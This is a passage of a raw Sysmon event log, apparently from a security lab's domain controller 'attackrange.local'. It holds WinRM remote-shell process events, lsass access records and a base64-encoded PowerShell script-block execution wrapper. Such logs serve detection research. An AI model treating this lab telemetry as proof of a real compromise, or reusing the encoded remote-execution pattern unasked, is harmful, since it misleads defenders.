QQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.669{266CAFBE-62DD-6064-1400-00000000AD01}13401692C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.669{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.653{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-CE02-00000000AD01}2164C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.643{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.450{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.450{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\S